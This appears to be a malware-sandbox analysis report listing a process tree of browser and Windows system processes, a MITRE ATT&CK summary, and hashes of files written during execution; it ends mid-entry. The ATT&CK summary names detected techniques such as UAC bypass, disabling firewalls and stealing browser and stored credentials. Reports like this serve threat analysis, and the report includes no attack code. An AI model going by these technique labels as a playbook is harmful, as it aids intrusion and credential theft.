C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4908 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5004 -prefMapHandle 5000 -prefsLen 32994 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e1f5528-5711-49ea-a011-5dcd959028f8} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" utility3⤵
- Checks processor information in registry
PID:6820
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5232 -childID 3 -isForBrowser -prefsHandle 5288 -prefMapHandle 5300 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e6b8f8aa-7f4e-45e2-b6af-47552e72e24a} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab3⤵PID:6804
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 4 -isForBrowser -prefsHandle 5348 -prefMapHandle 5280 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4501c85e-f5f5-4120-a725-f26a8d60174c} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab3⤵PID:5956
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5664 -childID 5 -isForBrowser -prefsHandle 5584 -prefMapHandle 5588 -prefsLen 27035 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a652184d-3e10-47db-8b4c-1d5c9402f960} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab3⤵PID:568
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6036 -childID 6 -isForBrowser -prefsHandle 5888 -prefMapHandle 5944 -prefsLen 33232 -prefMapSize 244628 -jsInitHandle 1264 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ccdc153a-5745-4998-987a-902a9edb6ce7} 5556 "\\.\pipe\gecko-crash-server-pipe.5556" tab3⤵PID:6024
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.Search_cw5n1h2txyewy1⤵PID:6056
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵PID:7056
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4704
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy1⤵PID:5244
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy1⤵PID:7020
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy1⤵PID:6064
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3916855 /state1:0x41c64e6d1⤵PID:1200
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
5Windows Service
5Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
5Windows Service
5Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1BITS Jobs
1Impair Defenses
6Disable or Modify System Firewall
1Disable or Modify Tools
3Modify Registry
9Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16B
MD5d166607f7f9af04834675c68a0ff81ad
SHA130e902fac905d7e3cf35229ebe1fcd49fd511200
SHA25606db08a0c7bb1811ac641249e5fbea38cff13b2a7f807b1f969520c813f0795b
SHA512464bcbfcef0678ca550d3268fedba1fb72795969a0887519f994c1e58be8a65037e4f43dadfbed1a3d9618c0d324a047ac6ede1d656e9749738e567ca88b775a
-
Filesize
1KB
MD56bf6915f8dc4e7289f2ecac6cc0b8939
SHA119d09e6e216b4a8e335efcffd5a8883010ed986c
SHA256c31d49338f489549551a5ca659c71b9e6fc1e3ea0052c7c2246bfcb9e392869f
SHA5128c9be2dc3b11fbb4ed86509201ffaaa888a4087881b1f23abfee6e53409866a8e01c3cd9e0b38b3cdf17ec4b4290a9ad095c569434f5a69a64f805f736982691
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
152B
MD50d57a449c855203411a38d5ae80bc24c
SHA1b361032efa556fc4557bbad595ce89c4b0c13dba
SHA256bb59bab10e406cd91bdfe4fc0e8ce2817a6ca32fc731ccb3f90b6b79c1a46c21
SHA5128d4244dc9c0e9518cd71aacaa54d43c1e2d74519e3e692160b2b040d00aac25c4ba7a5705391e50957d46c8c711dc07604effea3bc06c8956ecf717f61008da3
-
Filesize
152B
MD577fe0ce7e1f9c9ec2f198ad2536bf753
SHA12a366472f227a24f3c0fba0af544676ea58438d7
SHA256c69ca7653724e1e9e52518de8f4f030813e1431223d5b6ad3270531d8df89f00
SHA512e8d4e17b93fb19364eeeffc5b1016fdbe566a8b8d702005291ff263367840b8ccc76290d8a3ad457d40fb5d1c2204bdaa5acba9374236c77935ebb0fe597a095
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize48B
MD543da4cf476cac97a1c881cd1009243e6
SHA191d2e53549e69ad7b492b7820343d58253ddce64
SHA2561a01cb1f4892d7895588a10673201cbbbee725a8bb61063c8174fbdffd7f71b7
SHA5127bcd37f71f7991a38cbb34fb88d17b118756158d4d9d6457cf5bbeebf21c4ffeeacc4cc43340579401002ad1069db45893f45192fc0d3407d96ca9a319c13acc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize144B
MD5c991ddb7fc7967a4b7c51917779243ef
SHA1e4b3ecff68e971a5e6aa6a9daf27ff2988d23b16
SHA256fe43022ed32a261e7a2abc2990d661fb54236bf7d7a47de18c2bd1acebad899e
SHA512cfee8384c5d2b0e58be8134762337707ce813cf437f78bcfc1cc5712e771d1f40b8f688f0302fe69dfe257710918057c2c9f3e1a4b8150af65b3b70d4e94a669
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
124KB
MD5c192e3f47d604398a6d84215e759a5d0
SHA1ecc470d693ec1422b68302b113991fe2a2f5b4d1
SHA256a26b1eb0c68bb2ecdb2ed38a98ee08385c8e93570b9e1b6c9ebf705ae4dcb288
SHA5126d6beb9df87402c4a1990b947401d2a72c58ceec8cf848079f094e20e4b1a762fb0b70f144d902aeda53e7107d61c5c503b602be30f3c4bc18f8b6b44941bbe6
-
Filesize
399B
MD525825d90d1b9ee75a7d57fe258d4e9ac
SHA1049c359c016e3973f9656acfb730afc97b2c8a47
SHA256abe59438ea9efc3795399242a90ad5d35b030080e1e0e5fa99cf0ea975608483
SHA5127c60456d8960d18cfe0a3e35d9b8a2cf5a7ae6a15081362fc81eef4251cb75240f4496216d9458d07fffbdb4158e939da7a0c6954dc17230a70d496f2e3507d8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State~RFe57f77f.TMP
Filesize59B
MD52800881c775077e1c4b6e06bf4676de4
SHA12873631068c8b3b9495638c865915be822442c8b
SHA256226eec4486509917aa336afebd6ff65777b75b65f1fb06891d2a857a9421a974
SHA512e342407ab65cc68f1b3fd706cd0a37680a0864ffd30a6539730180ede2cdcd732cc97ae0b9ef7db12da5c0f83e429df0840dbf7596aca859a0301665e517377b
-
Filesize
5KB
MD511097c509df62175ad73881cd4c3900d
SHA1511852e49c708b9093dcdef850386f0e15c189aa
SHA256710a37e8a44babfabfcf39fecf0fc6ac32f0fb5855be56bcce21cefd4d7111c9
SHA512432d50e282059ff8e7a48cda0f0064549e820caf99a21c5d88c23808a28a464047559dc1e9ba6796809251a848b709609a90bc36d72a37013834bb0ae5210a46
-
Filesize
6KB
MD5329cf6d5a07ea3a8eee1334b7eaab687
SHA1d6149e121155bae24679a45fc65a8480a0c80517
SHA256175c0785d6697e4040a1593ff8427c23b82914479c87088cd932084b79302cef
SHA51294689be271f947b582817729bd73033044411fd58140bacfe50564b974f6595b6f40bd61d5a597e25046bce0dfe77b9c561bcb3a796836f9b9913eb78ab3124a
-
Filesize
5KB
MD5c40e8f15cff8e4760fba1f207ae7bd15
SHA10cccadc1a445e494055b946862db06a142725630
SHA25661648d1c1bcd2fd1ed63cb224fe123d98416ceb55a38a52eaec7e59ddeef0750
SHA512f0cd8d0fe334c31c6d0853577bc228defe144a58141b02777ac8dc663449a4efbf8a4df6ffbe3d5b19179ee231869ceaecb7e44c4f8d046068c61facb11c4448
-
Filesize
24KB
MD59b2345e425acf05ffaa1dee20d4fdbe7
SHA1aecf86c5a5d24b77aea68f6bc99e7f42c9048bc3
SHA2561eb6cc0eab0b222c1111dba69db74281366b9f5dc9f8707ff215b09155c58d14
SHA512647fc97d693b709ef3b0877b6de1d4f9f4e1085d35b809d27360ede1be52b37f9a967fb80ce43be35d60b52409c7e4036376d7d931c96f0660a2eeffa58a8208
-
Filesize
24KB
MD577006dacd174a80aa9b867f95d5df337
SHA17078db638c72ee5cf4ede7911e4421cc4ae103c7
SHA2565e22af33da2ed3f3197d9c899a8fec5e2716b54be019c484cd59960da8f143d9
SHA512e8268ed24af38eaebda4cd864e5580ed1bb63e3e4b72a27fe3404baeb7c8c944a7e79282712ac9d0b33f0123654dedb1984633d6ae2a5b412d6536e2b0389bb2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
8KB
MD50962291d6d367570bee5454721c17e11
SHA159d10a893ef321a706a9255176761366115bedcb
SHA256ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
Filesize
8KB
MD57ca3084bad725611f2979ae21a6f0b60
SHA107818b726632b129663eb98c2d8ffb4539461a68
SHA256b9313179d72f30f3c53be0d73459761af556f309db869705ec19407496cd45df
SHA512439eb7aa8fa24ba33af5d3efa87eaed3e7b5144fe1d8c3586f03d2934a1efaea97a7911fa59d498e3468fd6bd075a008f4ef13b1fc9faf6bda60623a78a00818
-
Filesize
10KB
MD5f632f0b9527f24f0e12fe717017781c1
SHA1f792db9e9adfa0f72432d7ab76a48711b27a12a2
SHA2569fc54406b64852191ede805d24131f1a96595f3a14ed468cdfde688ca6b45e54
SHA512c858424995a158b521a5d9731fb982dbcfd74e71453ce9ca6c998c7b4a1111f058d3e0e26c82ff3b40b77459f4636c8ca2fe3955b12bc623679b374df009b6b4
-
Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
Filesize
64KB
MD5987a07b978cfe12e4ce45e513ef86619
SHA122eec9a9b2e83ad33bedc59e3205f86590b7d40c
SHA256f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8
SHA51239b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
1KB
MD560b3262c3163ee3d466199160b9ed07d
SHA1994ece4ea4e61de0be2fdd580f87e3415f9e1ff6
SHA256e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb
SHA512081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af
-
Filesize
1KB
MD563cec056e7a725ade57d764b3b5eb821
SHA17a5a594208274cbe70f2b32e48ee207320f0e32c
SHA256379ea3c89c2137b2cc5aab316cfd89df4f4d000edf195af2ed3fc4531f05cd10
SHA5122466050dc7a347df529d48e13434411f193174b4ac7e8844b5bc0d509281f37c1ca41cdb01eb9fe3460431336c6bd77c15c9fa287245b261979fae548f2911a0
-
Filesize
1KB
MD5b4816d1848d7eebaa881bae9fdd4f932
SHA16097a2839f6063568d47475bf08fb79deb17b1da
SHA2563731000089b4462def922daad4f5bcfe243ce8c784afd404599a7e5474abb754
SHA512bedcc3f98d13a2a6543a30eda117f12b36d9484c88f05718bcb10dd3cd30cb4add9344b919efc619467e414b9a8bf94bb5ccc304d3e64c82efb0884cca14f66d
-
Filesize
1KB
MD5aafbdb3c07cdd80320ab27b863b5437d
SHA16fd1dd650e6d5248d17a8400445b56dc2d59315b
SHA25622bc5b85f76bdfbe30f699c832183f2be1985e7106b8af86f66e1a360b7a1c17
SHA512268496f2db5b511301bb4f1088229ae94b54c905984d46c8032330020c120efe8ead7c7df214214ad34b59f039c79cec7bbaa0d6af4013d0bd99cd0f809a1f53
-
Filesize
1KB
MD5df9654b31a6fe016b891a0e41f60de7b
SHA1a9cf29177e7fcd74da50df32ec9c99ad826526ae
SHA2567c3ec48ce2dcb95eaaa7b32957f1b282ae5fc3e0e71358d939f91fcdd99bf093
SHA512fab579769613cf611ad6318f95881c8ebee1d202e8c72025002861cdd884ce571ec3a76262686045a8e1bb361ae851c683476126cc9ef7585705cfa9c7615f0f
-
Filesize
1KB
MD56a807b1c91ac66f33f88a787d64904c1
SHA183c554c7de04a8115c9005709e5cd01fca82c5d3
SHA256155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256
SHA51229f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200
-
Filesize
64B
MD531ccf6922301f28200123c6157e31d11
SHA1d0e39aed0a9f5135ab5f2533b3890650fa46854a
SHA256c65718b9bd378bb4eb754a55d9a3b1a8940bbe775cdcb39e38a5234a450f744f
SHA512caa096a000e0ae4d3ca6a82331e3e996f2d3cf58932904295fdf04aa3dffe28b10f2a3367f748f56684d6ff7b7d1dfc31c8faa254722764af159b62d1fbdf283
-
Filesize
1KB
MD5851cfd418cdd61ba01242f4ba0345e89
SHA11ef2652a038b130bdb4b8615123de274222fda14
SHA256699f620949ddd394b8ae261f030978c1ad72c55c3c92929041a795dbe73d0fab
SHA5124cc537fbe491e50f632a440d5585bd52253577a7b4f5996f35f97ffd78b3f3559c556a5c521d63981f5c1ab132657f778b963c294b79ee66ffe2989d36490b4c
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
1KB
MD570141b44898d3dfc403963f4a315d73e
SHA125e0db32a2718a68c09feb0bfb2ea1d3cda7c921
SHA256a8355fcf8fb10c1b146451b4e1c7e6aed1fa4e5c87251eaf31763a83d585a7c2
SHA51262c0d252c5468ef95db6cfe3b7d40aa756ba9d6df7033ed3065e715ec42e804c82abdf714faa421442fe652efe351bd0e0076575b6e0e22fea277d9c7a9c4e13
-
Filesize
1KB
MD55d2f8331251ba32c496e836eebf1dda0
SHA1e53f5c2ff26f237f5cc8d400e89973afcd05a68b
SHA256bd0a86b7f7128969cc26c91f0cb0fa1bfb75b26cc5070aab7d35d0b005f399e3
SHA512a6f8047cba6216879e213a6d56a43877687c670bf4aa967cca7c89b64589f9bb2007adb8f0d7926e9f46bb9c9878abf7e5af8675a952f465c7d43e281f5ac05b
-
Filesize
1KB
MD55ff8fd3a61f91abe211d7ecd74f66153
SHA1a34c465ac57aa7226b81ae995433b30883e6aef7
SHA2563cdf2dffd358ac1769a3c0b25ec4fe193b2520228c656cc1f91d92d2623d57b1
SHA512b7a49c896e604975493972654d42053153d01c19094fe0104d0c8796d7172dcd59199756620d42c9d0ce46eba1aa45b1dc1f9177b15abbad6164fd05789c97ad
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9enwga8g.default-release\activity-stream.discovery_stream.json
Filesize19KB
MD51884a8340d5b869ff9c8244f809e8c83
SHA15d474cd9054c5d9411a1bc2c4779dc6263ffad3f
SHA2563228f2a028b33abaf8c59673137cf13ace94753b76a64faa833cdee58ef33a8e
SHA512a66cc85c417751cde9bef67d76861075f10709c8475d842823c8a7939f111a29ee6f9c1b91d55ed41ac0bc8726d98cc421408a9f5f178c72cb05c42d613f2d4c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\GRZVKQJP\microsoft.windows[1].xml
Filesize97B
MD5a7508c1b0b13db90caa6db05460aa78d
SHA1cf92a108078cfcb920eb1b0a6bc809c5fc61544a
SHA25629450d5cedbae51784499a95e98c79268ed85427580baa69a17e2441f07b2feb
SHA5127d0dfd9810e703518abbcc958484a0edb318cdcd7f83ee76c81ec05533ddc89f032bfbd1ace0eac855a882e6957a9dc417f594c81706b8bcfbd9ba9c29626268
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{01f33767-7db7-4e50-95af-6b7f3e4ebf36}\0.0.filtertrie.intermediate.txt
Filesize1KB
MD58609241ac301971b563b8864447f5fbc
SHA181b1e9382f7012f2441efcec40a5aabf46f34397
SHA25694d0c4ea1f705b557a8dd983931ecab83f4d19e691669f2723781d406d38a282
SHA512e536d2ae24ee17df34e28bcd1220f20901ec9b19a6f69b0c87f82a6535c813737681496927d9bea0b90e33b7c8236c77790a55d9a8514f5084ed3ad16d71c554
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\0.1.filtertrie.intermediate.txt
Filesize5B
MD534bd1dfb9f72cf4f86e6df6da0a9e49a
SHA15f96d66f33c81c0b10df2128d3860e3cb7e89563
SHA2568e1e6a3d56796a245d0c7b0849548932fee803bbdb03f6e289495830e017f14c
SHA512e3787de7c4bc70ca62234d9a4cdc6bd665bffa66debe3851ee3e8e49e7498b9f1cbc01294bf5e9f75de13fb78d05879e82fa4b89ee45623fe5bf7ac7e48eda96
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\0.2.filtertrie.intermediate.txt
Filesize5B
MD5c204e9faaf8565ad333828beff2d786e
SHA17d23864f5e2a12c1a5f93b555d2d3e7c8f78eec1
SHA256d65b6a3bf11a27a1ced1f7e98082246e40cf01289fd47fe4a5ed46c221f2f73f
SHA512e72f4f79a4ae2e5e40a41b322bc0408a6dec282f90e01e0a8aaedf9fb9d6f04a60f45a844595727539c1643328e9c1b989b90785271cc30a6550bbda6b1909f8
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\Apps.ft
Filesize1KB
MD56c78adbcc2f3ba7a2ad306983176414c
SHA1484787d9aef671594b4d91b6c7d2d5c215f46260
SHA2568f2abe81c4d834b96b5e39b504949cd04aef23e290309b413f501b396efd381a
SHA51269bb126822ee7008d30135f7c216bf364e8e70ec5ca09cff58671d3c29081f467719bedb172cc14962aeeef22c34fb7e4c4a6aed26c26691a4cfef3816138c69
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{91a3d3f3-317e-4adf-b76f-c60410e5114f}\Apps.index
Filesize879KB
MD55e4ec42046e35b20c1b8d97c17926572
SHA1d0f371a97b676240bd90f9fa1a0b14f97f9b1016
SHA2566a8c0c8cc58a866d0b874926f0ff1e2034a60bb18a2c584dd7f100be49c0febc
SHA512d8bc115f3e0632aa6df6d1ca949e53a5724eff26c9d42d90686df0aea777a00b6c3d1738adf7807c7c752f5f702c4bce1bee158d1f9e765a0148c960ea0113af
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\apps.csg
Filesize444B
MD55475132f1c603298967f332dc9ffb864
SHA14749174f29f34c7d75979c25f31d79774a49ea46
SHA2560b0af873ef116a51fc2a2329dc9102817ce923f32a989c7a6846b4329abd62cd
SHA51254433a284a6b7185c5f2131928b636d6850babebc09acc5ee6a747832f9e37945a60a7192f857a2f6b4dd20433ca38f24b8e438ba1424cc5c73f0aa2d8c946ff
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\apps.schema
Filesize150B
MD51659677c45c49a78f33551da43494005
SHA1ae588ef3c9ea7839be032ab4323e04bc260d9387
SHA2565af0fc2a0b5ccecdc04e54b3c60f28e3ff5c7d4e1809c6d7c8469f0567c090bb
SHA512740a1b6fd80508f29f0f080a8daddec802aabed467d8c5394468b0cf79d7628c1cb5b93cf69ed785999e8d4e2b0f86776b428d4fa0d1afcdf3cbf305615e5030
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\appsconversions.txt
Filesize1.4MB
MD52bef0e21ceb249ffb5f123c1e5bd0292
SHA186877a464a0739114e45242b9d427e368ebcc02c
SHA2568b9fae5ea9dd21c2313022e151788b276d995c8b9115ee46832b804a914e6307
SHA512f5b49f08b44a23f81198b6716195b868e76b2a23a388449356b73f8261107733f05baa027f8cdb8e469086a9869f4a64983c76da0dc978beb4ec1cb257532c6b
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\appsglobals.txt
Filesize343KB
MD5931b27b3ec2c5e9f29439fba87ec0dc9
SHA1dd5e78f004c55bbebcd1d66786efc5ca4575c9b4
SHA256541dfa71a3728424420f082023346365cca013af03629fd243b11d8762e3403e
SHA5124ba517f09d9ad15efd3db5a79747e42db53885d3af7ccc425d52c711a72e15d24648f8a38bc7e001b3b4cc2180996c6cac3949771aa1c278ca3eb7542eae23fd
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{eccade9a-fa83-4b9a-bc4b-279e463eaf49}\appssynonyms.txt
Filesize237KB
MD506a69ad411292eca66697dc17898e653
SHA1fbdcfa0e1761ddcc43a0fb280bbcd2743ba8820d
SHA2562aa90f795a65f0e636154def7d84094af2e9a5f71b1b73f168a6ea23e74476d1
SHA512ceb4b102309dffb65804e3a0d54b8627fd88920f555b334c3eac56b13eeb5075222d794c3cdbc3cda8bf1658325fdecf6495334e2c89b5133c9a967ec0d15693
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133797145603346924.txt
Filesize3KB
MD56c7c5879f1c75b60ca6fe7048fdf88b6
SHA1e3faf0e19132003dfc8617a40933f760ec6b64c4
SHA2565391afca6e19b795f4790c36b762d967859b8dcab7f34f40cd3e9d02fb8ab74c
